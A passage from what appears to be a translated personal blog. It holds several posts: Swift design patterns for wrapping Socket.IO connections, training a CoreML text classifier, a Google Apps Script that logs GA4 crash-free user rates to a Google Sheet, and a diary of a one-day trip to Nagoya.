+ appendBufferedCommands(connectionCommand: RequestBufferedCommand(event: event, callback: callback, sioManager: self))
+ return
+ }
+
+ print("request:\(event)")
+ }
+
+ func onEvent(event: String, callback: @escaping (Data?) -> Void) {
+ //
+ }
+
+ func appendBufferedCommands(connectionCommand: BufferedCommand) {
+ bufferedCommands.append(connectionCommand)
+ }
+
+ func executeBufferedCommands() {
+ // First in, first out
+ bufferedCommands.forEach { connectionCommand in
+ connectionCommand.execute()
+ }
+ bufferedCommands.removeAll()
+ }
+
+ func removeAllBufferedCommands() {
+ bufferedCommands.removeAll()
+ }
+}
+
+let manager = SIOManager()
+manager.send("send_event_1")
+manager.send("send_event_2")
+manager.request("request_event_1") { _ in
+ //
+}
+manager.state = .connected
+
Similarly, this can also be implemented on onEvent
.
Extension: You can further apply the Proxy Pattern to treat Buffer functionality as a type of Proxy.
The Connection has multiple states, with ordered states and transitions between states, allowing different operations in each state.
Connected
or directly to Disconnected
Disconnected
Reconnectiong
or Released
Connected
or Disconnected
SIOConnectionStateMachine
implements the state machine, currentSIOConnectionState
represents the current state, and created, connected, disconnected, reconnecting, released
list the possible state transitions of this state machine. enterXXXState() throws
implements the allowed and disallowed (throw error) actions when transitioning from the Current State to a specific state.SIOConnectionState
is the interface abstraction for all operations that states may use.1
+
// Code block translated comments only, code remains in English
+
Combining scenarios 1 and 2, with the ConnectionPool
flyweight pool and State Pattern state management; we continue to extend as described in the background goals, the Feature side does not need to worry about the connection mechanism behind the Connection; therefore, we have created a poller (named ConnectionKeeper
) that will periodically scan the ConnectionPool
for actively held Connection
and perform operations when the following conditions occur:
Connection
is in use and the state is not Connected
: change the state to Reconnecting
and attempt to reconnect.Connection
is not in use and the state is Connected
: change the state to Disconnected
.Connection
is not in use and the state is Disconnected
: change the state to Released
and remove it from the ConnectionPool
.1
+2
+3
+4
+5
+6
+7
+
if !connection.isOccupied() && connection.state == .connected then
+... connection.disconnected()
+else if !connection.isOccupied() && state == .released then
+... connection.release()
+else if connection.isOccupied() && state == .disconnected then
+... connection.reconnecting()
+end
+
By definition, the Chain of Responsibility Pattern does not allow a node to take over processing data and then pass it to the next node to continue processing. Either do it completely or don’t do it at all.
If the above scenario is more suitable, it should be the Interceptor Pattern.
ConnectionKeeperHandler
is an abstract node of the chain, specifically extracting the canExecute
method to avoid the situation where this node takes over processing but then wants to call the next node to continue execution, handle
connects the nodes in the chain, and execute
is the logic of how to handle the processing. ConnectionKeeperHandlerContext
is used to store data that will be used, isOccupied
indicates whether the Connection is in use.1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+50
+51
+52
+53
+54
+55
+56
+57
+58
+59
+60
+61
+62
+63
+64
+65
+66
+67
+68
+69
+70
+71
+72
+73
+74
+75
+76
+77
+78
+79
+80
+81
+82
+83
+84
+85
+86
+87
+88
+89
+90
+91
+92
+93
+94
+95
+96
+97
+98
+99
+100
+101
+102
+103
+104
+105
+106
+107
+108
+109
+110
+111
+112
+113
+114
+115
+116
+117
+118
+119
+120
+121
+122
+123
+124
+125
+126
+127
+128
+129
+130
+131
+132
+133
+
enum ConnectionState {
+ case created
+ case connected
+ case disconnected
+ case reconnecting
+ case released
+}
+
+protocol Connection {
+ var connectionState: ConnectionState {get}
+ var url: URL {get}
+ var id: UUID {get}
+
+ init(url: URL)
+
+ func connect()
+ func reconnect()
+ func disconnect()
+
+ func sendEvent(_ event: String)
+ func onEvent(_ event: String) -> AnyPublisher<Data?, Never>
+}
+
+// Socket.IO Implementation
+class SIOConnection: Connection {
+ let connectionState: ConnectionState = .created
+ let url: URL
+ let id: UUID = UUID()
+
+ required init(url: URL) {
+ self.url = url
+ //
+ }
+
+ func connect() {
+ //
+ }
+
+ func disconnect() {
+ //
+ }
+
+ func reconnect() {
+ //
+ }
+
+ func sendEvent(_ event: String) {
+ //
+ }
+
+ func onEvent(_ event: String) -> AnyPublisher<Data?, Never> {
+ //
+ return PassthroughSubject<Data?, Never>().eraseToAnyPublisher()
+ }
+}
+
+//
+
+struct ConnectionKeeperHandlerContext {
+ let connection: Connection
+ let isOccupied: Bool
+}
+
+protocol ConnectionKeeperHandler {
+ var nextHandler: ConnectionKeeperHandler? { get set }
+
+ func handle(context: ConnectionKeeperHandlerContext)
+ func execute(context: ConnectionKeeperHandlerContext)
+ func canExecute(context: ConnectionKeeperHandlerContext) -> Bool
+}
+
+extension ConnectionKeeperHandler {
+ func handle(context: ConnectionKeeperHandlerContext) {
+ if canExecute(context: context) {
+ execute(context: context)
+ } else {
+ nextHandler?.handle(context: context)
+ }
+ }
+}
+
+class DisconnectedConnectionKeeperHandler: ConnectionKeeperHandler {
+ var nextHandler: ConnectionKeeperHandler?
+
+ func execute(context: ConnectionKeeperHandlerContext) {
+ context.connection.disconnect()
+ }
+
+ func canExecute(context: ConnectionKeeperHandlerContext) -> Bool {
+ if context.connection.connectionState == .connected && !context.isOccupied {
+ return true
+ }
+ return false
+ }
+}
+
+class ReconnectConnectionKeeperHandler: ConnectionKeeperHandler {
+ var nextHandler: ConnectionKeeperHandler?
+
+ func execute(context: ConnectionKeeperHandlerContext) {
+ context.connection.reconnect()
+ }
+
+ func canExecute(context: ConnectionKeeperHandlerContext) -> Bool {
+ if context.connection.connectionState == .disconnected && context.isOccupied {
+ return true
+ }
+ return false
+ }
+}
+
+class ReleasedConnectionKeeperHandler: ConnectionKeeperHandler {
+ var nextHandler: ConnectionKeeperHandler?
+
+ func execute(context: ConnectionKeeperHandlerContext) {
+ context.connection.disconnect()
+ }
+
+ func canExecute(context: ConnectionKeeperHandlerContext) -> Bool {
+ if context.connection.connectionState == .disconnected && !context.isOccupied {
+ return true
+ }
+ return false
+ }
+}
+let connection = SIOConnection(url: URL(string: "wss://pinkoi.com")!)
+let disconnectedHandler = DisconnectedConnectionKeeperHandler()
+let reconnectHandler = ReconnectConnectionKeeperHandler()
+let releasedHandler = ReleasedConnectionKeeperHandler()
+disconnectedHandler.nextHandler = reconnectHandler
+reconnectHandler.nextHandler = releasedHandler
+
+disconnectedHandler.handle(context: ConnectionKeeperHandlerContext(connection: connection, isOccupied: false))
+
We need to go through the setup of the Connection
we encapsulated before using it, such as providing the URL Path, setting Config, etc.
1
+2
+3
+4
+5
+6
+7
+8
+
❌
+let connection = Connection()
+connection.send(event) // unexpected method call, should call .connect() first
+✅
+let connection = Connection()
+connection.connect()
+connection.send(event)
+// but...who knows???
+
SIOConnectionBuilder
is the builder for Connection
, responsible for setting and storing data needed to build Connection
; ConnectionConfiguration
abstract interface ensures that .connect()
must be called before using Connection
to get the Connection
instance.1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+50
+51
+52
+53
+54
+55
+56
+57
+58
+59
+60
+61
+62
+63
+64
+65
+66
+67
+68
+69
+70
+71
+72
+73
+74
+75
+76
+77
+78
+79
+80
+81
+82
+83
+84
+85
+86
+87
+88
+89
+90
+91
+92
+93
+94
+95
+
enum ConnectionState {
+ case created
+ case connected
+ case disconnected
+ case reconnecting
+ case released
+}
+
+protocol Connection {
+ var connectionState: ConnectionState {get}
+ var url: URL {get}
+ var id: UUID {get}
+
+ init(url: URL)
+
+ func connect()
+ func reconnect()
+ func disconnect()
+
+ func sendEvent(_ event: String)
+ func onEvent(_ event: String) -> AnyPublisher<Data?, Never>
+}
+
+// Socket.IO Implementation
+class SIOConnection: Connection {
+ let connectionState: ConnectionState = .created
+ let url: URL
+ let id: UUID = UUID()
+
+ required init(url: URL) {
+ self.url = url
+ //
+ }
+
+ func connect() {
+ //
+ }
+
+ func disconnect() {
+ //
+ }
+
+ func reconnect() {
+ //
+ }
+
+ func sendEvent(_ event: String) {
+ //
+ }
+
+ func onEvent(_ event: String) -> AnyPublisher<Data?, Never> {
+ //
+ return PassthroughSubject<Data?, Never>().eraseToAnyPublisher()
+ }
+}
+
+//
+class SIOConnectionClient: ConnectionConfiguration {
+ private let url: URL
+ private let config: [String: Any]
+
+ init(url: URL, config: [String: Any]) {
+ self.url = url
+ self.config = config
+ }
+
+ func connect() -> Connection {
+ // set config
+ return SIOConnection(url: url)
+ }
+}
+
+protocol ConnectionConfiguration {
+ func connect() -> Connection
+}
+
+class SIOConnectionBuilder {
+ private(set) var config: [String: Any] = [:]
+
+ func setConfig(_ config: [String: Any]) -> SIOConnectionBuilder {
+ self.config = config
+ return self
+ }
+
+ // url is required parameter
+ func build(url: URL) -> ConnectionConfiguration {
+ return SIOConnectionClient(url: url, config: self.config)
+ }
+}
+
+let builder = SIOConnectionBuilder().setConfig(["test":123])
+
+
+let connection1 = builder.build(url: URL(string: "wss://pinkoi.com/1")!).connect()
+let connection2 = builder.build(url: URL(string: "wss://pinkoi.com/1")!).connect()
+
Extension: Here you can also apply the Factory Pattern, to produce SIOConnection
using a factory.
The above are the four scenarios encountered in encapsulating Socket.IO and the seven Design Patterns used to solve the problems.
Contrary to the naming and demonstration in the text, this image represents the actual design architecture; there may be an opportunity for the original designer to share design concepts and open source the project.
Who designed these and is responsible for the Socket.IO encapsulation project?
Main architect, evaluation and application of Design Patterns, implementation of design in Kotlin on the Android side.
Project lead of the Platform Team, Pair programming, implementation of design in Swift on the iOS side, discussion and raising questions (a.k.a. speaking up), and finally writing this article to share with everyone.
If you have any questions or suggestions, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
Explore CoreML 2.0, how to convert or train models and apply them in real products
Following the previous article on researching machine learning on iOS, this article officially delves into using CoreML.
First, a brief history: Apple released CoreML (including Vision introduced in the previous article) machine learning framework in 2017; in 2018, they followed up with CoreML 2.0, which not only improved performance but also supports custom CoreML models.
If you’ve only heard the term “machine learning” but don’t understand what it means, here’s a simple explanation in one sentence:
“Predict the outcome of similar future events based on your past experiences.”
For example: I like to add ketchup to my egg pancake. After buying it a few times, the breakfast shop owner remembers, “Sir, ketchup?” I reply, “Yes” — the owner predicts correctly; if I reply, “No, because it’s radish cake + egg pancake” — the owner remembers and adjusts the question next time.
Input data: egg pancake, cheese egg pancake, egg pancake + radish cake, radish cake, egg
Output data: add ketchup / no ketchup
Model: the owner’s memory and judgment
My understanding of machine learning is also purely theoretical, without in-depth practical knowledge. If there are any mistakes, please correct me.
This is where I must thank Apple for productizing machine learning, making it accessible with just basic concepts and lowering the entry barrier. It was only after implementing this example that I felt a tangible connection to machine learning, sparking a great interest in this field.
The first and most important step is the “model” mentioned earlier. Where do models come from?
There are three ways:
Awesome-CoreML-Models is a GitHub project that collects many pre-trained models.
For model conversion, refer to the official website or online resources.
For text segmentation, refer to Natural Language Processing in iOS Apps: An Introduction to NSLinguisticTagger
In simple terms, we provide the machine with “text content” and “categories” to train the computer to classify future data. For example: “Click to see the latest offers!”, “Get $1000 shopping credit now” => “Advertisement”; “Alan sent you a message”, “Your account is about to expire” => “Important matters”
Practical applications: spam detection, tag generation, classification prediction
p.s. I haven’t thought of any practical uses for image recognition yet, so I haven’t researched it; interested friends can check this article, the official site provides a convenient GUI training tool for images!!
Required Tools: MacOS Mojave⬆ + Xcode 10
Training Tool: BlankSpace007/TextClassiferPlayground (The official tool only provides GUI training tools for images, for text you need to write your own; this is a third-party tool provided by an expert online)
Data structure as shown above, supports .json, .csv files
Prepare the data to be used for training, here we use Phpmyadmin (Mysql) to export the training data
1
+
SELECT `title` AS `text`,`type` AS `label` FROM `posts` WHERE `status` = '1'
+
Change the export format to JSON
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+
[
+ {"type":"header","version":"4.7.5","comment":"Export to JSON plugin for PHPMyAdmin"},
+ {"type":"database","name":"db"},
+ {"type":"table","name":"posts","database":"db","data":
+ // Delete above
+ [
+ {
+ "label":"",
+ "text":""
+ }
+ ]
+ // Delete below
+ }
+]
+
Open the downloaded JSON file and keep only the content within the DATA structure
After downloading the training tool, click TextClassifer.playground to open Playground
Click the red box to execute -> click the green box to switch View display
Drag the JSON file into the GUI tool
Open the Console below to check the training progress, seeing “Test Accuracy” means the model training is complete
If there is too much data, it will test your computer’s processing power.
Fill in the basic information and click “Save”
Save the trained model file
CoreML model file
At this point, your model is already trained! Isn’t it easy?
Specific Training Method:
At this point, most of the work is done. Next, just add the model file to the iOS project and write a few lines of code.

Drag/drop the model file (*.mlmodel) into the project
1
+2
+3
+4
+5
+6
+7
+
import CoreML
+
+//
+if #available(iOS 12.0, *),let prediction = try? textClassifier().prediction(text: "Text content to predict") {
+ let type = prediction.label
+ print("I think it is...\(type)")
+}
+
Done!
The above three points, based on the information currently available, are not feasible.
Currently, I am applying it in a practical APP to predict the classification when posting articles.
I used about 100 pieces of training data, and the current prediction accuracy is about 35%, mainly for experimental purposes.
— — — — —
It’s that simple to complete the first machine learning project in your life; there is still a long way to go to learn how the background works. I hope this project can give everyone some inspiration!
References: WWDC2018 Create ML (Part 2)
If you have any questions or comments, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
Using Google Apps Script to query Crashlytics through Google Analytics and automatically fill it into Google Sheet
In the previous article, “Crashlytics + Big Query to Create a More Real-Time and Convenient Crash Tracking Tool”, we exported Crashlytics crash records as Raw Data to Big Query and used Google Apps Script to automatically schedule queries for the Top 10 Crashes & post messages to the Slack Channel.
This article continues to automate an important metric related to app crashes — Crash-Free Users Rate, the percentage of users not affected by crashes. Many app teams continuously track and record this metric, which was traditionally done manually. The goal here is to automate this repetitive task and avoid potential errors in manual data entry. As mentioned earlier, Firebase Crashlytics does not provide any API for querying, so we need to connect Firebase data to other Google services and then use those service APIs to query the relevant data.
Initially, I thought this data could also be queried from Big Query; however, this approach is entirely wrong because Big Query contains Raw Data of crashes and does not include data of users who did not experience crashes, making it impossible to calculate the Crash-Free Users Rate. There is limited information on this requirement online, and after extensive searching, I found a mention of Google Analytics. I knew that Firebase’s Analytics and Events could be connected to GA for queries, but I did not expect the Crash-Free Users Rate to be included. After reviewing GA’s API, Bingo!
Google Analytics Data API (GA4) provides two metrics:
Knowing the way forward, we can start implementing it!
You can refer to the official instructions for setup steps, which are omitted here.
Before writing code, we can use the Web GUI Tool provided by the official site to quickly build query conditions and obtain query results. Once the results are as desired, we can start writing code.
yesterday
, today
, 30daysAgo
, 7daysAgo
).crashFreeUsersRate
.platform
(device type iOS/Android/Desktop…).platform
, string
, exact
, iOS
or Android
.Query the Crash Free Users Rate for both platforms separately.
Scroll to the bottom and click “Make Request” to view the results. We can get the Crash-Free Users Rate within the specified date range.
You can go back and open Firebase Crashlytics to compare if the data under the same conditions is the same.
It has been observed that there might be slight differences in numbers between the two (we had a difference of 0.0002 in one number), the reason is unknown, but it is within an acceptable error range. If you consistently use GA Crash-Free Users Rate, it cannot be considered an error.
Next is the automation part. We will use Google Apps Script to query GA Crash-Free Users Rate data and automatically fill it into our Google Sheet, achieving the goal of automatic filling and tracking.
Assume our Google Sheet is as shown above.
You can click Extensions -> Apps Script at the top of Google Sheet to create a Google Apps Script or click here to go to Google Apps Script -> click “New Project” at the top left.
After entering, you can click the unnamed project name at the top to give it a project name.
In the “Services” on the left, click “+” to add “Google Analytics Data API”.
Go back to the GA4 Query Explorer tool, and next to the Make Request button, you can check “Show Request JSON” to get the Request JSON for these conditions.
Convert this Request JSON into Google Apps Script as follows:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+
// Remember to add Google Analytics Data API to Services, or you'll see this error: ReferenceError: AnalyticsData is not defined
+// https://ga-dev-tools.web.app/ga4/query-explorer/ -> property id
+const propertyId = "";
+// https://docs.google.com/spreadsheets/d/googleSheetID/
+const googleSheetID = "";
+// Google Sheet name
+const googleSheetName = "App Crash-Free Users Rate";
+
+function execute() {
+ Logger.log(fetchCrashFreeUsersRate())
+}
+
+function fetchCrashFreeUsersRate(platform = "ios", startDate = "30daysAgo", endDate = "today") {
+ const dimensionPlatform = AnalyticsData.newDimension();
+ dimensionPlatform.name = "platform";
+
+ const metric = AnalyticsData.newMetric();
+ metric.name = "crashFreeUsersRate";
+
+ const dateRange = AnalyticsData.newDateRange();
+ dateRange.startDate = startDate;
+ dateRange.endDate = endDate;
+
+ const filterExpression = AnalyticsData.newFilterExpression();
+ const filter = AnalyticsData.newFilter();
+ filter.fieldName = "platform";
+ const stringFilter = AnalyticsData.newStringFilter()
+ stringFilter.value = platform;
+ stringFilter.matchType = "EXACT";
+ filter.stringFilter = stringFilter;
+ filterExpression.filter = filter;
+
+ const request = AnalyticsData.newRunReportRequest();
+ request.dimensions = [dimensionPlatform];
+ request.metrics = [metric];
+ request.dateRanges = dateRange;
+ request.dimensionFilter = filterExpression;
+
+ const report = AnalyticsData.Properties.runReport(request, "properties/" + propertyId);
+
+ return parseFloat(report.rows[0].metricValues[0].value) * 100;
+}
+
In the initial Property selection menu, the number below the selected Property is the propertyId
.
googleSheetID
/editPaste the above code into the Google Apps Script code block on the right & select the “execute” function from the method dropdown at the top. Then click Debug to test if the data can be retrieved correctly:
The first time you run it, an authorization request window will appear:
Follow the steps to complete account authorization.
If the execution is successful, the Crash-Free Users Rate will be printed in the Log below, indicating a successful query.
Next, we just need to add automatic filling into Google Sheets to complete the task!
Complete Code:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+50
+51
+52
+53
+
// Remember to add Google Analytics Data API to Services, or you'll see this error: ReferenceError: AnalyticsData is not defined
+
+// https://ga-dev-tools.web.app/ga4/query-explorer/ -> property id
+const propertyId = "";
+// https://docs.google.com/spreadsheets/d/googleSheetID/
+const googleSheetID = "";
+// Google Sheet name
+const googleSheetName = "";
+
+function execute() {
+ const today = new Date();
+ const daysAgo7 = new Date(new Date().setDate(today.getDate() - 6)); // Today is not counted, so it's -6
+
+ const spreadsheet = SpreadsheetApp.openById(googleSheetID);
+ const sheet = spreadsheet.getSheetByName(googleSheetName);
+
+ var rows = [];
+ rows[0] = Utilities.formatDate(daysAgo7, "GMT+8", "MM/dd")+"~"+Utilities.formatDate(today, "GMT+8", "MM/dd");
+ rows[1] = fetchCrashFreeUsersRate("ios", Utilities.formatDate(daysAgo7, "GMT+8", "yyyy-MM-dd"), Utilities.formatDate(today, "GMT+8", "yyyy-MM-dd"));
+ rows[2] = fetchCrashFreeUsersRate("android", Utilities.formatDate(daysAgo7, "GMT+8", "yyyy-MM-dd"), Utilities.formatDate(today, "GMT+8", "yyyy-MM-dd"));
+ sheet.appendRow(rows);
+}
+
+function fetchCrashFreeUsersRate(platform = "ios", startDate = "30daysAgo", endDate = "today") {
+ const dimensionPlatform = AnalyticsData.newDimension();
+ dimensionPlatform.name = "platform";
+
+ const metric = AnalyticsData.newMetric();
+ metric.name = "crashFreeUsersRate";
+
+ const dateRange = AnalyticsData.newDateRange();
+ dateRange.startDate = startDate;
+ dateRange.endDate = endDate;
+
+ const filterExpression = AnalyticsData.newFilterExpression();
+ const filter = AnalyticsData.newFilter();
+ filter.fieldName = "platform";
+ const stringFilter = AnalyticsData.newStringFilter()
+ stringFilter.value = platform;
+ stringFilter.matchType = "EXACT";
+ filter.stringFilter = stringFilter;
+ filterExpression.filter = filter;
+
+ const request = AnalyticsData.newRunReportRequest();
+ request.dimensions = [dimensionPlatform];
+ request.metrics = [metric];
+ request.dateRanges = dateRange;
+ request.dimensionFilter = filterExpression;
+
+ const report = AnalyticsData.Properties.runReport(request, "properties/" + propertyId);
+
+ return parseFloat(report.rows[0].metricValues[0].value) * 100;
+}
+
Click “Run or Debug” above to execute “execute”.
Go back to Google Sheet, data added successfully!
Select the clock button on the left -> Bottom right “+ Add Trigger”.
Click Save after setting.
From now on, recording and tracking App Crash-Free Users Rate data is fully automated; no manual query & input needed; everything is handled automatically by the machine!
We only need to focus on solving App Crash issues!
p.s. Unlike the previous article using Big Query which costs money to query data, querying Crash-Free Users Rate and using Google Apps Script in this article are completely free, so feel free to use them.
If you want to sync the results to a Slack Channel, refer to the previous article:
If you have any questions or comments, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
Peach Aviation Nagoya One-Day Flash Ticket Travel Experience
A round-trip ticket for a day trip to Nagoya is an activity launched by Peach Aviation:
I bought a round-trip ticket to Nagoya with airport service fee included for $5,600
at that time, no checked baggage, no meals, no assigned seats; both flights were red-eye flights:
According to official promotional materials, the longest stay is 16 hours and 45 minutes!
Carry-on baggage regulations: Two pieces per person & total weight less than 7 kilograms
Date: 2023/09/11, Solo trip
To speed up entry, I filled out the entry information in advance and completed the entry procedures directly using a QR code:
Chubu Centrair International Airport Information
A one-day flash is a test of physical and mental endurance; I originally planned to wait at the airport or sleep on the plane, but I wasn’t sleepy because the waiting time at the airport was too early. After boarding the plane, the seat was too small, not by the window, the engine noise was very loud, and I didn’t really fall asleep, so it was like not sleeping all night; I started the Nagoya itinerary at 6:00 after getting off the plane; I was so tired that I slept for over half an hour in a quiet cafe at Nagoya Tower at noon (quiet, not many people).
Time and attractions are limited, so I couldn’t go too far.
In addition to the body’s energy, the phone’s battery is also a big test; I brought a 20,000 mAh Xiaomi power bank to complete the entire itinerary (probably charged the iPhone 13 back and forth 4–5 times).
I returned to Taiwan around 2–3 am, with no public transportation, so I had to take a taxi back to Taipei.
You can pay a few hundred more to choose a window seat, prepare a neck pillow, and earplugs for better sleep.
Arrived too early, the check-in counter opened at 23:55 (although I didn’t have checked baggage, I couldn’t check in online for some reason, so I had to wait for the counter to open).
Still an hour before check-in opened, so I went back to the B1 food street to find a place to rest; all the shops in the food street were closed at 11 PM (including convenience stores), couldn’t find anything to eat.
The check-in counter opened early, I returned to the departure hall at 11:40 and saw that check-in had started; without checked baggage, just carrying a backpack, quickly completed check-in & security check & departure.
Starting from 9/11, officially counting down 24 hours!
It’s worth mentioning that there is a free lounge in Terminal 1, just follow the signs to the VIP lounge; the environment and seats are similar to a cafe, there is even a shower room (open from 6 AM to 10 PM); for more details, refer to this article.
It’s actually better to sleep in the lounge area because you can lie down… But at that time, I just took a quick look and started looking for a place to buy food at the airport (because there was no in-flight meal), but it was late and everything was closed, I only found a vending machine selling cookies, so I bought a pack of Yimei cream puffs and a can of tea.
Arrived really early, not many people in the boarding gate area; the chairs are in pairs, making it difficult to lie down and sleep (very uncomfortable, I got up after taking the photo), sleeping with your head up is also uncomfortable, and the boarding gate area is very cold; but at that time, I was still feeling okay, not sleepy, as time passed, more people arrived, it got noisier, making it even harder to sleep; so I just closed my eyes to rest and conserve energy, reviewed some basic Japanese (hiragana), planning to sleep on the plane later.
The flight was slightly delayed, boarding was supposed to start at 01:55, delayed by 10 minutes; I completed boarding at 02:15.
The seat was very small, no headrest by the aisle, luckily I had a neck pillow for some support, but the noise of the engines and neck discomfort made it almost impossible to sleep, so I endured the bumpy ride all the way to Nagoya; there was no screen displaying the flight distance on the plane, making the time feel very long.
If I had to choose again, I would pay a little extra for a window seat; one, there’s a better place to rest your head, and two, you can see the sunrise from the window when arriving in Japan in the morning!!
Perhaps due to the early morning and no need to pick up luggage, it took less than 15 minutes from landing to immigration; but the weather wasn’t great, it was raining heavily in Nagoya.
One image shows seating information and the other shows entry/exit ticket (for the machine).
[_KKday Chubu Centrair International Airport NGO ⇆ Nagoya Station Meitetsu Airport Express Train e-Ticket_](https://www.kkday.com/zh-tw/product/20418-chubu-centrair-international-airport-express-train-transfer-to-nagoya?cid=19365&ud1=9da2c51fa4f2){:target=”_blank”}
I first bought a one-way train ticket from Chubu Centrair International Airport to Nagoya + uSky train ($271) online, thinking since I’m here, might as well experience the newest and best train; assigned seats, very stable and comfortable, and it’s an express train.
However, if you want to save money and convenience, you can actually buy tickets on-site or take a regular train directly to the station; attach the train schedule and stops, or directly search from Meitetsu website:
You need to get off at Kanayama (NH34) and transfer to “Meijo Line” to go to Kamiiida Station.
The store opens at 8:00, but there were no people around early in the morning, and the nearby Osu shopping street was not open yet.
Coffee is a must, especially after staying up all night; the shrimp in the fried shrimp toast is cut into pieces, giving a chewy texture.
Nagoya Castle opens at 9:00, other attractions don’t open that early, and it’s on the way from Kamiiida Station, so I decided to visit Nagoya Castle first.
After having breakfast, I arrived at Nagoya Castle Station around 9:02.
Upon exiting the station, I found it was raining heavily outside, and I didn’t expect rain in Japan, so I didn’t bring an umbrella; there were no convenience stores nearby, but I finally found a FamilyMart in the underground street at Nagoya Castle Station B1, bought an umbrella, and continued to Nagoya Castle.
As I entered Nagoya Castle, the rain eased a bit, but the main keep was under maintenance and not open to visitors, so I only visited the splendid Honmaru Palace next to it.
To enter the Honmaru Palace, you need to take off your shoes and store your bag (free, but you need a ¥100 coin).
Located at the lower right corner of Nagoya Castle, about 2 stops away; I took a bus after leaving Nagoya Castle.
The weather was cloudy with occasional sunshine when I arrived, then it cleared up, and it became cloudy again when I left.
After buying a ticket, you can go up to the observation deck to overlook Nagoya City (if you only want to visit the middle-level café, no ticket is needed, and you can still enjoy some views).
Café view, feeling sleepy around 10:30; slept here until after 11, lots of seats, few people, quiet… perfect for a nap.
Oasis 21 is just outside Nagoya Tower, but not much to see due to rain + weekday + morning, so just took a quick look around and left.
Approaching noon, wanted to try Nagoya’s famous miso pork cutlet, the store is about one or two stops away from Nagoya Tower, decided to walk there.
Arrived to find a long line due to the crowd… time was precious, since near Osu Shopping Street, continued walking there to find food.
Walking towards Osu Kannon, just before Osu Kannon there is another branch of Shichijo, went in for a meal.
Mindlessly ordered a set meal, realized I ordered wrong, mainly wanted to eat the miso pork cutlet in the top left corner, set meal includes miso pork cutlet + fried willow leaf fish + tsukemono + side dish + soup + rice; miso pork cutlet was delicious but not enough!
This store is right next to Osu Kannon.
Main hall under maintenance, just walked around outside and left.
Beware of birds, many pigeons outside, can buy feed to feed the pigeons.
Walked through Osu Shopping Street again, headed back to Meijo Line, towards Atsuta Shrine.
Bought a Benten fruit daifuku to eat on the way, thin and tender skin, plenty of fresh fruit juice, bought two at once! (I think it’s tastier than Rokkakudo XD)
Went to a drugstore in the shopping street and bought some medicines that can be taken on the plane to bring back to Taiwan.
Exiting Atsuta Shrine Station on the Meijo Line, still a bit of a walk to reach the main gate of Atsuta Shrine for worship.
After a simple worship, bought some amulets and left.
The last point is to visit Meitetsu (actually very tired when arriving here).
After a stroll in the underground street, head towards JR GATE TOWER, go up to the Starbucks on the 15th floor where you can enjoy a free view.
Because the outdoor seats were not open due to rain, and the indoor seats were full, I didn’t buy a cup of coffee to sit and rest while enjoying the view; took some photos and then started heading downstairs to Takashimaya Department Store, where there is a Harbs but requires queuing.
Across the street, there is a Sky Promenade in Nagoya, a new observation deck, but I didn’t go because I was tired, needed to buy another ticket, and the weather was not good; by the time I checked if I could still go and the points of interest I was interested in were gone; in the end, I just continued strolling down to the underground street to buy some souvenirs (Frog Hometown); bought a one-way ticket from Nagoya Railway to Chubu Centrair International Airport + uSky train ($271) and returned to the airport.
It was a bit of a shame that it wasn’t even 5:00 PM yet… but going to other attractions again would be too far… and I wanted to avoid the crowd during rush hour.
Took a photo of the real uSky.
The flight is not until 23:15, still a long time to go.
First, try the famous Tebasaki in Nagoya.
There are many things to see at NGO Airport, besides food and drinks inside, there is also a large observation deck where you can see planes take off and land up close! (Terminal 1)
Or go to Terminal 2 first to see the free aircraft museum (it was closed when I went).
There is also a Lawson and a capsule toy store here (but they also have operating hours).
Had dinner at the airport’s Nagoya Udon, Nagoya’s specialty noodles are flat.
The taste was good, but accidentally ordered two main dishes… their tonkatsu was tonkatsu rice XD
After eating, continue waiting for the flight… waiting for the counter to open (opens at 20:45).
Glanced at the clock in the corner and went to queue for departure preparation around 20:00; the carry-on baggage check by the airline is quite strict, the rule is two pieces weighing less than 7 kilograms each, no turning a blind eye; saw someone simply going to buy a PS5 and come back, seemed like a good choice for a one-day flash target.
I only have one bag, so I can carry another one. I happened to buy a bottle of Tanjirou 750 ml back to Taiwan. (5,700 yen, 100 yen more expensive than Tokyo)
Coca-Cola is delicious. If you see it in a supermarket or vending machine, you can buy it and try it out. It is a collaboration between Suntory and Pepsi, not available in Taiwan. It is made like draft beer but as a cola, very fizzy, not too syrupy. I usually end up pouring out regular cola because it’s too sweet, but I can finish a Coca-Cola Life!
Back at the United Airlines carry-on baggage check, they strictly check if you only have two items. If not, they will ask you to either make it two items on the spot or pay extra.
Due to flight delay, originally scheduled for 23:15, delayed to 23:50; took off around 00:15.
But luckily got a window seat, can have a good sleep.
Studied the onboard facilities after waking up, only then did I realize that flight information, entertainment videos can be viewed by connecting to onboard WiFi with a phone, and ordering can also be done directly with a phone.
Someone ordered something similar to spare ribs chicken noodles to eat, the whole cabin was filled with a delicious smell, very tempting.
Fortunately, got some rest on the plane due to the window seat; feeling okay.
Have to say that transportation in Taiwan is very inconvenient. Taking a red-eye flight to Taoyuan Airport, can only take a scary flat-rate taxi or expensive Uber back to Taipei; if you want to take public transportation, you can only wait for the 4-5 am shuttle.
Later found out that there is also Inuyama Castle in Nagoya, if rearranged, should go to Inuyama Castle first, and didn’t get to eat eel rice!
If you have any questions or suggestions, feel free to contact me.
===
===
